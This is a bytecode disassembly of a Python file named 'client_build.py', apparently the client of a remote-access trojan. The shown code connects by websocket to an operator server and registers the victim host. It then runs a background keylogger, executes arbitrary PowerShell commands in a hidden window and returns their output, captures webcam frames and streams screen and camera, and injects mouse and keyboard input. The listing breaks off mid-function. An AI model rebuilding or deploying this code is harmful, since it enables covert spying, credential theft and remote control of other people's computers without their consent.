### main ###
  --            MAKE_CELL               12 (cam_ws)
                MAKE_CELL               13 (ws)

 543            RETURN_GENERATOR
                POP_TOP
        L1:     RESUME                   0

 546            LOAD_GLOBAL              1 (_log + NULL)
                LOAD_CONST               1 ('Starting. Target: ws://')
                LOAD_GLOBAL              2 (SERVER_IP)
                FORMAT_SIMPLE
                LOAD_CONST               2 (':')
                LOAD_GLOBAL              4 (SERVER_PORT)
                FORMAT_SIMPLE
                LOAD_CONST               3 ('/ws/client')
                BUILD_STRING             5
                CALL                     1
                POP_TOP

 547            LOAD_CONST               4 (0)
                STORE_FAST               0 (retry_count)

 550            LOAD_CONST               5 (<code object _kl at 0x0000023B2EE74AB0, file "client_build.py", line 550>)
                MAKE_FUNCTION
                STORE_FAST               1 (_kl)

 565            LOAD_GLOBAL              6 (threading)
                LOAD_ATTR                8 (Thread)
                PUSH_NULL
                LOAD_FAST                1 (_kl)
                LOAD_CONST               6 (True)
                LOAD_CONST               7 (('target', 'daemon'))
                CALL_KW                  2
                LOAD_ATTR               11 (start + NULL|self)
                CALL                     0
                POP_TOP

 567            NOP

 568    L2:     NOP

 569    L3:     LOAD_CONST               8 ('ws://')
                LOAD_GLOBAL              2 (SERVER_IP)
                FORMAT_SIMPLE
                LOAD_CONST               2 (':')
                LOAD_GLOBAL              4 (SERVER_PORT)
                FORMAT_SIMPLE
                LOAD_CONST               3 ('/ws/client')
                BUILD_STRING             5
                STORE_FAST               2 (uri)

 570            LOAD_GLOBAL              1 (_log + NULL)
                LOAD_CONST               9 ('Connecting to ')
                LOAD_FAST                2 (uri)
                FORMAT_SIMPLE
                BUILD_STRING             2
                CALL                     1
                POP_TOP

 571            LOAD_CONST               8 ('ws://')
                LOAD_GLOBAL              2 (SERVER_IP)
                FORMAT_SIMPLE
                LOAD_CONST               2 (':')
                LOAD_GLOBAL              4 (SERVER_PORT)
                FORMAT_SIMPLE
                LOAD_CONST              10 ('/ws/client_cam')
                BUILD_STRING             5
                STORE_FAST               3 (uri_cam)

 572            LOAD_GLOBAL             12 (websockets)
                LOAD_ATTR               14 (connect)
                PUSH_NULL
                LOAD_FAST                2 (uri)
                LOAD_CONST              11 (10)
                LOAD_CONST              12 (30)
                LOAD_CONST              13 (5)
                LOAD_CONST              14 (33554432)
                LOAD_CONST              15 (('ping_interval', 'ping_timeout', 'close_timeout', 'max_size'))
                CALL_KW                  5
                BEFORE_ASYNC_WITH
                GET_AWAITABLE            1
                LOAD_CONST               0 (None)
        L4:     SEND                     3 (to L7)
        L5:     YIELD_VALUE              1
        L6:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L4)
        L7:     END_SEND
        L8:     STORE_DEREF             13 (ws)
                LOAD_GLOBAL             12 (websockets)
                LOAD_ATTR               14 (connect)
                PUSH_NULL
                LOAD_FAST                3 (uri_cam)
                LOAD_CONST              11 (10)
                LOAD_CONST              12 (30)
                LOAD_CONST              13 (5)
                LOAD_CONST              14 (33554432)
                LOAD_CONST              15 (('ping_interval', 'ping_timeout', 'close_timeout', 'max_size'))
                CALL_KW                  5
                BEFORE_ASYNC_WITH
                GET_AWAITABLE            1
                LOAD_CONST               0 (None)
        L9:     SEND                     3 (to L12)
       L10:     YIELD_VALUE              1
       L11:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L9)
       L12:     END_SEND
       L13:     STORE_DEREF             12 (cam_ws)

 573            LOAD_GLOBAL              1 (_log + NULL)
                LOAD_CONST              16 ('Connected. Registering...')
                CALL                     1
                POP_TOP

 575            LOAD_GLOBAL             16 (mss)
                LOAD_ATTR               16 (mss)
                PUSH_NULL
                CALL                     0
                BEFORE_WITH
       L14:     STORE_FAST               4 (s)

 576            LOAD_FAST                4 (s)
                LOAD_ATTR               18 (monitors)
                LOAD_CONST               4 (0)
                BINARY_SUBSCR
                STORE_FAST               5 (m)

 577            LOAD_FAST                5 (m)
                LOAD_CONST              17 ('width')
                BINARY_SUBSCR
                LOAD_FAST                5 (m)
                LOAD_CONST              18 ('height')
                BINARY_SUBSCR
                LOAD_CONST              19 (('w', 'h'))
                BUILD_CONST_KEY_MAP      2
                STORE_FAST               6 (res)

 575   L15:     LOAD_CONST               0 (None)
                LOAD_CONST               0 (None)
                LOAD_CONST               0 (None)
                CALL                     2
                POP_TOP

 579   L16:     LOAD_DEREF              13 (ws)
                LOAD_ATTR               21 (send + NULL|self)
                LOAD_GLOBAL             22 (json)
                LOAD_ATTR               24 (dumps)
                PUSH_NULL

 580            LOAD_GLOBAL             26 (CMD_REG)

 581            LOAD_GLOBAL             28 (DEVICE_ID)
                LOAD_GLOBAL             30 (HOSTNAME)
                LOAD_GLOBAL             32 (platform)
                LOAD_ATTR               32 (platform)
                PUSH_NULL
                CALL                     0
                LOAD_CONST               6 (True)
                LOAD_FAST_CHECK          6 (res)
                LOAD_CONST              20 (('id', 'hostname', 'os', 'is_admin', 'res'))
                BUILD_CONST_KEY_MAP      5

 579            LOAD_CONST              21 (('cmd', 'data'))
                BUILD_CONST_KEY_MAP      2
                CALL                     1
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
       L17:     SEND                     3 (to L20)
       L18:     YIELD_VALUE              1
       L19:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L17)
       L20:     END_SEND
                POP_TOP

 583            LOAD_DEREF              12 (cam_ws)
                LOAD_ATTR               21 (send + NULL|self)
                LOAD_GLOBAL             22 (json)
                LOAD_ATTR               24 (dumps)
                PUSH_NULL
                LOAD_GLOBAL             26 (CMD_REG)
                LOAD_CONST              22 ('id')
                LOAD_GLOBAL             28 (DEVICE_ID)
                BUILD_MAP                1
                LOAD_CONST              21 (('cmd', 'data'))
                BUILD_CONST_KEY_MAP      2
                CALL                     1
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
       L21:     SEND                     3 (to L24)
       L22:     YIELD_VALUE              1
       L23:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L21)
       L24:     END_SEND
                POP_TOP

 584            LOAD_GLOBAL              1 (_log + NULL)
                LOAD_CONST              23 ('Registered.')
                CALL                     1
                POP_TOP

 586            LOAD_FAST               13 (ws)
                BUILD_TUPLE              1
                LOAD_CONST              24 (<code object recv_loop at 0x0000023B2FA9D340, file "client_build.py", line 586>)
                MAKE_FUNCTION
                SET_FUNCTION_ATTRIBUTE   8 (closure)
                STORE_FAST               7 (recv_loop)

 718            LOAD_FAST               12 (cam_ws)
                BUILD_TUPLE              1
                LOAD_CONST              25 (<code object cam_stream_loop at 0x0000023B2FBD0000, file "client_build.py", line 718>)
                MAKE_FUNCTION
                SET_FUNCTION_ATTRIBUTE   8 (closure)
                STORE_FAST               8 (cam_stream_loop)

 745            LOAD_FAST               13 (ws)
                BUILD_TUPLE              1
                LOAD_CONST              26 (<code object stream_loop at 0x0000023B2FA9C2F0, file "client_build.py", line 745>)
                MAKE_FUNCTION
                SET_FUNCTION_ATTRIBUTE   8 (closure)
                STORE_FAST               9 (stream_loop)

 778            LOAD_GLOBAL             34 (asyncio)
                LOAD_ATTR               36 (gather)
                PUSH_NULL
                LOAD_FAST                7 (recv_loop)
                PUSH_NULL
                CALL                     0
                LOAD_FAST                9 (stream_loop)
                PUSH_NULL
                CALL                     0
                LOAD_FAST                8 (cam_stream_loop)
                PUSH_NULL
                CALL                     0
                CALL                     3
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
       L25:     SEND                     3 (to L28)
       L26:     YIELD_VALUE              1
       L27:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L25)
       L28:     END_SEND
                POP_TOP

 572   L29:     LOAD_CONST               0 (None)
                LOAD_CONST               0 (None)
                LOAD_CONST               0 (None)
                CALL                     2
                GET_AWAITABLE            2
                LOAD_CONST               0 (None)
       L30:     SEND                     3 (to L33)
       L31:     YIELD_VALUE              1
       L32:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L30)
       L33:     END_SEND
                POP_TOP
       L34:     LOAD_CONST               0 (None)
                LOAD_CONST               0 (None)
                LOAD_CONST               0 (None)
                CALL                     2
                GET_AWAITABLE            2
                LOAD_CONST               0 (None)
       L35:     SEND                     3 (to L38)
       L36:     YIELD_VALUE              1
       L37:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L35)
       L38:     END_SEND
                POP_TOP

 567   L39:     EXTENDED_ARG             1
                JUMP_BACKWARD          436 (to L2)

 572   L40:     CLEANUP_THROW
       L41:     EXTENDED_ARG             1
                JUMP_BACKWARD_NO_INTERRUPT 359 (to L7)
       L42:     CLEANUP_THROW
       L43:     EXTENDED_ARG             1
                JUMP_BACKWARD_NO_INTERRUPT 329 (to L12)

 575   L44:     PUSH_EXC_INFO
                WITH_EXCEPT_START
                TO_BOOL
                POP_JUMP_IF_TRUE         1 (to L45)
                RERAISE                  2
       L45:     POP_TOP
       L46:     POP_EXCEPT
                POP_TOP
                POP_TOP
                EXTENDED_ARG             1
                JUMP_BACKWARD_NO_INTERRUPT 275 (to L16)

  --   L47:     COPY                     3
                POP_EXCEPT
                RERAISE                  1

 579   L48:     CLEANUP_THROW
       L49:     JUMP_BACKWARD_NO_INTERRUPT 197 (to L20)

 583   L50:     CLEANUP_THROW
       L51:     JUMP_BACKWARD_NO_INTERRUPT 141 (to L24)

 778   L52:     CLEANUP_THROW
       L53:     JUMP_BACKWARD_NO_INTERRUPT 67 (to L28)

 572   L54:     CLEANUP_THROW
       L55:     JUMP_BACKWARD_NO_INTERRUPT 53 (to L33)
       L56:     PUSH_EXC_INFO
                WITH_EXCEPT_START
                GET_AWAITABLE            2
                LOAD_CONST               0 (None)
       L57:     SEND                     4 (to L61)
       L58:     YIELD_VALUE              1
       L59:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L57)
       L60:     CLEANUP_THROW
       L61:     END_SEND
                TO_BOOL
                POP_JUMP_IF_TRUE         1 (to L62)
                RERAISE                  2
       L62:     POP_TOP
       L63:     POP_EXCEPT
                POP_TOP
                POP_TOP
                JUMP_BACKWARD_NO_INTERRUPT 74 (to L34)

  --   L64:     COPY                     3
                POP_EXCEPT
                RERAISE                  1

 572   L65:     CLEANUP_THROW
       L66:     JUMP_BACKWARD_NO_INTERRUPT 65 (to L38)
       L67:     PUSH_EXC_INFO
                WITH_EXCEPT_START
                GET_AWAITABLE            2
                LOAD_CONST               0 (None)
       L68:     SEND                     4 (to L72)
       L69:     YIELD_VALUE              1
       L70:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L68)
       L71:     CLEANUP_THROW
       L72:     END_SEND
                TO_BOOL
                POP_JUMP_IF_TRUE         1 (to L73)
                RERAISE                  2
       L73:     POP_TOP
       L74:     POP_EXCEPT
                POP_TOP
                POP_TOP
       L75:     JUMP_BACKWARD_NO_INTERRUPT 86 (to L39)

  --   L76:     COPY                     3
                POP_EXCEPT
                RERAISE                  1
       L77:     PUSH_EXC_INFO

 780            LOAD_GLOBAL             38 (Exception)
                CHECK_EXC_MATCH
                POP_JUMP_IF_FALSE      103 (to L86)
                STORE_FAST              10 (ex)

 781   L78:     LOAD_GLOBAL              1 (_log + NULL)
                LOAD_CONST              27 ('Connection error: ')
                LOAD_FAST               10 (ex)
                FORMAT_SIMPLE
                BUILD_STRING             2
                CALL                     1
                POP_TOP

 783            LOAD_GLOBAL             41 (min + NULL)
                LOAD_CONST              28 (3)
                LOAD_CONST              29 (2)
                LOAD_GLOBAL             41 (min + NULL)
                LOAD_FAST                0 (retry_count)
                LOAD_CONST              13 (5)
                CALL                     2
                BINARY_OP                8 (**)
                BINARY_OP                5 (*)
                LOAD_CONST              30 (60)
                CALL                     2
                STORE_FAST              11 (delay)

 784            LOAD_GLOBAL              1 (_log + NULL)
                LOAD_CONST              31 ('Retrying in ')
                LOAD_FAST               11 (delay)
                FORMAT_SIMPLE
                LOAD_CONST              32 (' seconds...')
                BUILD_STRING             3
                CALL                     1
                POP_TOP

 785            LOAD_GLOBAL             34 (asyncio)
                LOAD_ATTR               42 (sleep)
                PUSH_NULL
                LOAD_FAST               11 (delay)
                CALL                     1
                GET_AWAITABLE            0
                LOAD_CONST               0 (None)
       L79:     SEND                     4 (to L83)
       L80:     YIELD_VALUE              1
       L81:     RESUME                   3
                JUMP_BACKWARD_NO_INTERRUPT 5 (to L79)
       L82:     CLEANUP_THROW
       L83:     END_SEND
                POP_TOP

 786            LOAD_FAST                0 (retry_count)
                LOAD_CONST              33 (1)
                BINARY_OP               13 (+=)
                STORE_FAST               0 (retry_count)
       L84:     POP_EXCEPT
                LOAD_CONST               0 (None)
                STORE_FAST              10 (ex)
                DELETE_FAST             10 (ex)
                JUMP_BACKWARD_NO_INTERRUPT 197 (to L39)

  --   L85:     LOAD_CONST               0 (None)
                STORE_FAST              10 (ex)
                DELETE_FAST             10 (ex)
                RERAISE                  1

 780   L86:     RERAISE                  0

  --   L87:     COPY                     3
                POP_EXCEPT
                RERAISE                  1
       L88:     CALL_INTRINSIC_1         3 (INTRINSIC_STOPITERATION_ERROR)
                RERAISE                  1
ExceptionTable:
  L1 to L2 -> L88 [0] lasti
  L3 to L5 -> L77 [0]
  L5 to L6 -> L40 [3]
  L6 to L8 -> L77 [0]
  L8 to L10 -> L67 [1] lasti
  L10 to L11 -> L42 [4]
  L11 to L13 -> L67 [1] lasti
  L13 to L14 -> L56 [2] lasti
  L14 to L15 -> L44 [3] lasti
  L15 to L18 -> L56 [2] lasti
  L18 to L19 -> L48 [4]
  L19 to L22 -> L56 [2] lasti
  L22 to L23 -> L50 [4]
  L23 to L26 -> L56 [2] lasti
  L26 to L27 -> L52 [4]
  L27 to L29 -> L56 [2] lasti
  L29 to L31 -> L67 [1] lasti
  L31 to L32 -> L54 [3]
  L32 to L34 -> L67 [1] lasti
  L34 to L36 -> L77 [0]
  L36 to L37 -> L65 [2]
  L37 to L39 -> L77 [0]
  L39 to L40 -> L88 [0] lasti
  L40 to L41 -> L77 [0]
  L42 to L43 -> L67 [1] lasti
  L44 to L46 -> L47 [5] lasti
  L46 to L49 -> L56 [2] lasti
  L50 to L51 -> L56 [2] lasti
  L52 to L53 -> L56 [2] lasti
  L54 to L55 -> L67 [1] lasti
  L56 to L58 -> L64 [4] lasti
  L58 to L59 -> L60 [7]
  L59 to L63 -> L64 [4] lasti
  L63 to L65 -> L67 [1] lasti
  L65 to L66 -> L77 [0]
  L67 to L69 -> L76 [3] lasti
  L69 to L70 -> L71 [6]
  L70 to L74 -> L76 [3] lasti
  L74 to L75 -> L77 [0]
  L75 to L76 -> L88 [0] lasti
  L76 to L77 -> L77 [0]
  L77 to L78 -> L87 [1] lasti
  L78 to L80 -> L85 [1] lasti
  L80 to L81 -> L82 [3]
  L81 to L84 -> L85 [1] lasti
  L84 to L85 -> L88 [0] lasti
  L85 to L87 -> L87 [1] lasti
  L87 to L88 -> L88 [0] lasti

Disassembly of <code object _kl at 0x0000023B2EE74AB0, file "client_build.py", line 550>:
 550            RESUME                   0

 552            LOAD_CONST               1 (<code object on_press at 0x0000023B2EE74180, file "client_build.py", line 552>)
                MAKE_FUNCTION
                STORE_FAST               0 (on_press)

 559            NOP

 560    L1:     LOAD_GLOBAL              1 (KeyboardListener + NULL)
                LOAD_FAST                0 (on_press)
                LOAD_CONST               2 (('on_press',))
                CALL_KW                  1
                BEFORE_WITH
        L2:     STORE_FAST               1 (l)

 561            LOAD_FAST                1 (l)
                LOAD_ATTR                3 (join + NULL|self)
                CALL                     0
                POP_TOP

 560    L3:     LOAD_CONST               0 (None)
                LOAD_CONST               0 (None)
                LOAD_CONST               0 (None)
                CALL                     2
                POP_TOP
        L4:     RETURN_CONST             0 (None)
        L5:     PUSH_EXC_INFO
                WITH_EXCEPT_START
                TO_BOOL
                POP_JUMP_IF_TRUE         1 (to L6)
                RERAISE                  2
        L6:     POP_TOP
        L7:     POP_EXCEPT
                POP_TOP
                POP_TOP
        L8:     RETURN_CONST             0 (None)

  --    L9:     COPY                     3
                POP_EXCEPT
                RERAISE                  1
       L10:     PUSH_EXC_INFO

 562            POP_TOP

 563   L11:     POP_EXCEPT
                RETURN_CONST             0 (None)

  --   L12:     COPY                     3
                POP_EXCEPT
                RERAISE                  1
ExceptionTable:
  L1 to L2 -> L10 [0]
  L2 to L3 -> L5 [1] lasti
  L3 to L4 -> L10 [0]
  L5 to L7 -> L9 [3] lasti
  L7 to L8 -> L10 [0]
  L9 to L10 -> L10 [0]
  L10 to L11 -> L12 [1] lasti

Disassembly of <code object on_press at 0x0000023B2EE74180, file "client_build.py", line 552>:
 552           RESUME                   0

 554           LOAD_GLOBAL              0 (_keylog_on)
               TO_BOOL
               POP_JUMP_IF_FALSE       30 (to L3)

 555           NOP

 556   L1:     LOAD_GLOBAL              2 (_keybuf)
               LOAD_GLOBAL              5 (str + NULL)
               LOAD_FAST                0 (k)
               LOAD_ATTR                6 (char)
               CALL                     1
               BINARY_OP               13 (+=)
               STORE_GLOBAL             1 (_keybuf)
       L2:     RETURN_CONST             0 (None)

 554   L3:     RETURN_CONST             0 (None)

  --   L4:     PUSH_EXC_INFO

 557           POP_TOP

 558           LOAD_GLOBAL              2 (_keybuf)
               LOAD_CONST               1 ('[')
               LOAD_FAST                0 (k)
               FORMAT_SIMPLE
               LOAD_CONST               2 (']')
               BUILD_STRING             3
               BINARY_OP               13 (+=)
               STORE_GLOBAL             1 (_keybuf)
       L5:     POP_EXCEPT
               RETURN_CONST             0 (None)

  --   L6:     COPY                     3
               POP_EXCEPT
               RERAISE                  1
ExceptionTable:
  L1 to L2 -> L4 [0]
  L4 to L5 -> L6 [1] lasti

Disassembly of <code object recv_loop at 0x0000023B2FA9D340, file "client_build.py", line 586>:
  --             COPY_FREE_VARS           1

 586             RETURN_GENERATOR
                 POP_TOP
         L1:     RESUME                   0

 588     L2:     NOP

 589     L3:     LOAD_DEREF              28 (ws)
                 LOAD_ATTR                1 (recv + NULL|self)
                 CALL                     0
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
         L4:     SEND                     3 (to L7)
         L5:     YIELD_VALUE              1
         L6:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L4)
         L7:     END_SEND
                 STORE_FAST               0 (raw)

 590             LOAD_GLOBAL              3 (isinstance + NULL)
                 LOAD_FAST                0 (raw)
                 LOAD_GLOBAL              4 (bytes)
                 CALL                     2
                 TO_BOOL
                 POP_JUMP_IF_FALSE      211 (to L15)

 591             LOAD_GLOBAL              7 (len + NULL)
                 LOAD_FAST                0 (raw)
                 CALL                     1
                 LOAD_CONST               2 (1)
                 COMPARE_OP             148 (bool(>))
                 POP_JUMP_IF_FALSE      193 (to L14)
                 LOAD_FAST                0 (raw)
                 LOAD_CONST               3 (0)
                 BINARY_SUBSCR
                 LOAD_CONST               4 (3)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      184 (to L14)

 592     L8:     NOP

 593     L9:     LOAD_FAST                0 (raw)
                 LOAD_CONST               2 (1)
                 LOAD_CONST               0 (None)
                 BINARY_SLICE
                 STORE_FAST               1 (audio_data)

 594             LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               10 (path)
                 LOAD_ATTR               13 (join + NULL|self)
                 LOAD_GLOBAL              8 (os)
                 LOAD_ATTR               14 (environ)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST               5 ('TEMP')
                 LOAD_CONST               6 ('.')
                 CALL                     2
                 LOAD_CONST               7 ('admin_audio_')
                 LOAD_GLOBAL             18 (uuid)
                 LOAD_ATTR               20 (uuid4)
                 PUSH_NULL
                 CALL                     0
                 LOAD_ATTR               22 (hex)
                 FORMAT_SIMPLE
                 LOAD_CONST               8 ('.wav')
                 BUILD_STRING             3
                 CALL                     2
                 STORE_FAST               2 (tmp)

 595             LOAD_GLOBAL             25 (open + NULL)
                 LOAD_FAST                2 (tmp)
                 LOAD_CONST               9 ('wb')
                 CALL                     2
                 BEFORE_WITH
        L10:     STORE_FAST               3 (f)

 596             LOAD_FAST                3 (f)
                 LOAD_ATTR               27 (write + NULL|self)
                 LOAD_FAST                1 (audio_data)
                 CALL                     1
                 POP_TOP

 595    L11:     LOAD_CONST               0 (None)
                 LOAD_CONST               0 (None)
                 LOAD_CONST               0 (None)
                 CALL                     2
                 POP_TOP

 597    L12:     NOP

 598    L13:     LOAD_CONST               3 (0)
                 LOAD_CONST               0 (None)
                 IMPORT_NAME             14 (winsound)
                 STORE_FAST               4 (winsound)

 599             LOAD_FAST                4 (winsound)
                 LOAD_ATTR               31 (PlaySound + NULL|self)
                 LOAD_FAST_LOAD_FAST     36 (tmp, winsound)
                 LOAD_ATTR               32 (SND_FILENAME)
                 LOAD_FAST                4 (winsound)
                 LOAD_ATTR               34 (SND_ASYNC)
                 BINARY_OP                7 (|)
                 CALL                     2
                 POP_TOP

 604    L14:     EXTENDED_ARG             1
                 JUMP_BACKWARD          257 (to L2)

 605    L15:     LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               42 (loads)
                 PUSH_NULL
                 LOAD_FAST                0 (raw)
                 CALL                     1
                 STORE_FAST               6 (msg)

 606             LOAD_FAST                6 (msg)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              12 ('cmd')
                 CALL                     1
                 STORE_FAST               7 (cmd)

 607             LOAD_FAST                6 (msg)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              13 ('args')
                 BUILD_MAP                0
                 CALL                     2
                 STORE_FAST               8 (a)

 608    L16:     NOP

 609    L17:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL             44 (CMD_MOUSE)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       46 (to L19)

 610             LOAD_GLOBAL             47 (do_move + NULL)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              14 ('x')
                 LOAD_CONST               3 (0)
                 CALL                     2
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              15 ('y')
                 LOAD_CONST               3 (0)
                 CALL                     2
                 CALL                     2
                 POP_TOP
        L18:     EXTENDED_ARG             8
                 JUMP_FORWARD          2254 (to L134)

 611    L19:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL             48 (CMD_CLICK)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       46 (to L21)

 612             LOAD_GLOBAL             51 (do_click + NULL)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              16 ('btn')
                 LOAD_CONST              17 ('left')
                 CALL                     2
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              18 ('down')
                 LOAD_CONST               1 (True)
                 CALL                     2
                 CALL                     2
                 POP_TOP
        L20:     EXTENDED_ARG             8
                 JUMP_FORWARD          2198 (to L134)

 613    L21:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL             52 (CMD_KEY)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       29 (to L23)

 614             LOAD_GLOBAL             55 (do_key + NULL)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              19 ('key')
                 LOAD_CONST              20 ('')
                 CALL                     2
                 CALL                     1
                 POP_TOP
        L22:     EXTENDED_ARG             8
                 JUMP_FORWARD          2159 (to L134)

 615    L23:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL             56 (CMD_SHELL)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      145 (to L29)

 616             LOAD_GLOBAL             58 (subprocess)
                 LOAD_ATTR               60 (Popen)
                 PUSH_NULL

 617             LOAD_CONST              21 ('powershell')
                 LOAD_CONST              22 ('-Command')
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              12 ('cmd')
                 LOAD_CONST              23 ('echo ok')
                 CALL                     2
                 BUILD_LIST               3

 618             LOAD_GLOBAL             58 (subprocess)
                 LOAD_ATTR               62 (PIPE)
                 LOAD_GLOBAL             58 (subprocess)
                 LOAD_ATTR               64 (STDOUT)

 619             LOAD_CONST               1 (True)
                 LOAD_CONST              24 (134217728)

 616             LOAD_CONST              25 (('stdout', 'stderr', 'text', 'creationflags'))
                 CALL_KW                  5
                 STORE_FAST               9 (p)

 621             LOAD_FAST                9 (p)
                 LOAD_ATTR               67 (communicate + NULL|self)
                 LOAD_CONST              26 (30)
                 LOAD_CONST              27 (('timeout',))
                 CALL_KW                  1
                 LOAD_CONST               3 (0)
                 BINARY_SUBSCR
                 STORE_FAST              10 (out)

 622             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_GLOBAL             40 (json)
                 LOAD_ATTR               70 (dumps)
                 PUSH_NULL
                 LOAD_GLOBAL             56 (CMD_SHELL)
                 LOAD_CONST              28 ('out')
                 LOAD_FAST               10 (out)
                 BUILD_MAP                1
                 LOAD_CONST              29 (('cmd', 'data'))
                 BUILD_CONST_KEY_MAP      2
                 CALL                     1
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
        L24:     SEND                     3 (to L27)
        L25:     YIELD_VALUE              1
        L26:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L24)
        L27:     END_SEND
                 POP_TOP
        L28:     EXTENDED_ARG             7
                 JUMP_FORWARD          2004 (to L134)

 623    L29:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL             72 (CMD_CAM)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      177 (to L49)

 624             LOAD_CONST               3 (0)
                 LOAD_CONST               0 (None)
                 IMPORT_NAME             37 (cv2)
                 STORE_FAST              11 (cv2)

 625             LOAD_GLOBAL             76 (_camera_lock)
                 BEFORE_ASYNC_WITH
                 GET_AWAITABLE            1
                 LOAD_CONST               0 (None)
        L30:     SEND                     3 (to L33)
        L31:     YIELD_VALUE              1
        L32:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L30)
        L33:     END_SEND
        L34:     POP_TOP

 626             LOAD_GLOBAL             79 (_open_camera + NULL)
                 CALL                     0
                 STORE_FAST              12 (cap)

 627             LOAD_FAST               12 (cap)
                 POP_JUMP_IF_NONE        19 (to L35)

 628             LOAD_FAST               12 (cap)
                 LOAD_ATTR               81 (read + NULL|self)
                 CALL                     0
                 UNPACK_SEQUENCE          2
                 STORE_FAST_STORE_FAST  222 (ret, frame)
                 JUMP_FORWARD             2 (to L36)

 630    L35:     LOAD_CONST              30 (False)
                 STORE_FAST              13 (ret)

 625    L36:     LOAD_CONST               0 (None)
                 LOAD_CONST               0 (None)
                 LOAD_CONST               0 (None)
                 CALL                     2
                 GET_AWAITABLE            2
                 LOAD_CONST               0 (None)
        L37:     SEND                     3 (to L40)
        L38:     YIELD_VALUE              1
        L39:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L37)
        L40:     END_SEND
                 POP_TOP

 631    L41:     LOAD_FAST_CHECK         13 (ret)
                 TO_BOOL
                 POP_JUMP_IF_TRUE        23 (to L43)

 632             LOAD_GLOBAL             39 (_log + NULL)
                 LOAD_CONST              31 ('CMD_CAM: unable to grab camera frame')
                 CALL                     1
                 POP_TOP

 633             LOAD_GLOBAL             83 (_close_camera + NULL)
                 CALL                     0
                 POP_TOP
        L42:     EXTENDED_ARG             7
                 JUMP_FORWARD          1895 (to L134)

 635    L43:     LOAD_FAST               11 (cv2)
                 LOAD_ATTR               85 (imencode + NULL|self)
                 LOAD_CONST              32 ('.jpg')
                 LOAD_FAST_CHECK         14 (frame)
                 LOAD_FAST               11 (cv2)
                 LOAD_ATTR               86 (IMWRITE_JPEG_QUALITY)
                 LOAD_CONST              33 (60)
                 BUILD_LIST               2
                 CALL                     3
                 UNPACK_SEQUENCE          2
                 STORE_FAST              15 (_)
                 STORE_FAST              16 (buf)

 636             LOAD_DEREF              28 (ws)
                 LOAD_ATTR               69 (send + NULL|self)
                 LOAD_CONST              34 (b'\x01')
                 LOAD_FAST               16 (buf)
                 LOAD_ATTR               89 (tobytes + NULL|self)
                 CALL                     0
                 BINARY_OP                0 (+)
                 CALL                     1
                 GET_AWAITABLE            0
                 LOAD_CONST               0 (None)
        L44:     SEND                     3 (to L47)
        L45:     YIELD_VALUE              1
        L46:     RESUME                   3
                 JUMP_BACKWARD_NO_INTERRUPT 5 (to L44)
        L47:     END_SEND
                 POP_TOP
        L48:     EXTENDED_ARG             7
                 JUMP_FORWARD          1817 (to L134)

 637    L49:     LOAD_FAST                7 (cmd)
                 LOAD_GLOBAL             90 (CMD_VIEW)
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE      188 (to L53)

 639             LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              35 ('substream')
                 CALL                     1
                 LOAD_CONST              36 ('cam')
                 COMPARE_OP              88 (bool(==))
                 POP_JUMP_IF_FALSE       88 (to L51)

 640             LOAD_GLOBAL             93 (bool + NULL)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              37 ('enabled')
                 LOAD_CONST              30 (False)
                 CALL                     2
                 CALL                     1
                 STORE_GLOBAL            47 (_cam_stream_enabled)

 641             LOAD_GLOBAL             93 (bool + NULL)
                 LOAD_FAST                8 (a)
                 LOAD_ATTR               17 (get + NULL|self)
                 LOAD_CONST              38 ('audio')
                 LOAD_CONST              30 (False)
                 CALL                     2
                 CALL                     1
